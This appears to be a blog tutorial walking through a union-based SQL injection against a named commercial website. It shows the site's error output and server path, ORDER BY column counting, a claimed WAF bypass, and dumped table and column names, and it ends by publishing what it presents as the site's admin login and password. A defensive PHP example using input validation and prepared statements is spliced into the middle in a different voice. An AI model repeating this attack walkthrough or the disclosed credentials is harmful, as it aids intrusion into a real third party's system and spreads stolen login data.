Union Based SQLi Using DIOS and Simple WAF Bypassing

Usama Varikkottil
Hey Everyone!
Usama Varikkottil Here :D


site:http://www.professionalsystems.pk/products-list.php?cate=303&parent=1


Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/professi/public_html/products-list.php on line 139
/ AXIOS mAX Range


Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/professi/public_html/products-list.php on line 154

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/professi/public_html/products-list.php on

SQL Error

Error Fixed By Adding SQL Comment

Counting Number of Columns



ORDER+BY 4 --- no error
ORDER+BY 5 --- error

So there are 4 columns.
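
The defensive counterpart to the steps above, as an added example (not from the original video or the site's code): the warnings show products-list.php handing a failed query result to mysql_fetch_array() and printing the server path, and ORDER BY appended to cate reaches the SQL text. The code below validates cate and parent as integers, binds them in a prepared statement, and keeps driver errors out of the response. The table layout, sample rows and function names are assumptions, and in-memory SQLite stands in for MySQL so it runs offline.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the site's database (in-memory SQLite so the
// example runs offline; the same PDO calls apply to the pdo_mysql driver).
function demoDb(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE products (id INTEGER PRIMARY KEY, cate INTEGER, parent INTEGER, name TEXT)');
    $pdo->exec("INSERT INTO products (cate, parent, name) VALUES (303, 1, 'Sample product A'), (304, 1, 'Sample product B')");
    return $pdo;
}

// Allowlist check: the parameter must consist of digits only.
// Anything else (quotes, comments, ORDER BY, UNION, encodings) is rejected.
function intParam($raw): ?int
{
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 9) {
        return null;
    }
    return (int) $raw;
}

// Hypothetical replacement for the lookup in products-list.php.
function listProducts(PDO $pdo, array $query): array
{
    $cate = intParam($query['cate'] ?? null);
    $parent = intParam($query['parent'] ?? null);
    if ($cate === null || $parent === null) {
        return ['status' => 400, 'rows' => []];
    }
    try {
        // Values are bound, never concatenated into the SQL text.
        $stmt = $pdo->prepare('SELECT id, name FROM products WHERE cate = :cate AND parent = :parent');
        $stmt->execute([':cate' => $cate, ':parent' => $parent]);
        return ['status' => 200, 'rows' => $stmt->fetchAll(PDO::FETCH_ASSOC)];
    } catch (PDOException $e) {
        // Log server-side; never echo driver errors or file paths to the client.
        error_log('products-list query failed: ' . $e->getMessage());
        return ['status' => 500, 'rows' => []];
    }
}

// Constructed inputs: one normal value and two probe-style values.
$pdo = demoDb();
foreach (['303', '303 ORDER BY 5', "303'"] as $cate) {
    $result = listProducts($pdo, ['cate' => $cate, 'parent' => '1']);
    printf("cate=%-16s status=%d rows=%d\n", var_export($cate, true), $result['status'], count($result['rows']));
}
```
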

Now find the vulnerable column


WAF

Bypass it
Bypassed!!!
Vulnerable column is 2


Now use DIOS (dump in one shot) ;)


Table names
--------
admin
categories
products
etc., etc.


:D :D

Find column names from the table admin


Columns from the table "admin"
++++++++++++
admin_id
fname
etc., etc.


Login id and password


admin---login_id
psys2000---password
Thanks For Watching



Within 2 minutes we can do SQLi ;)


Bye
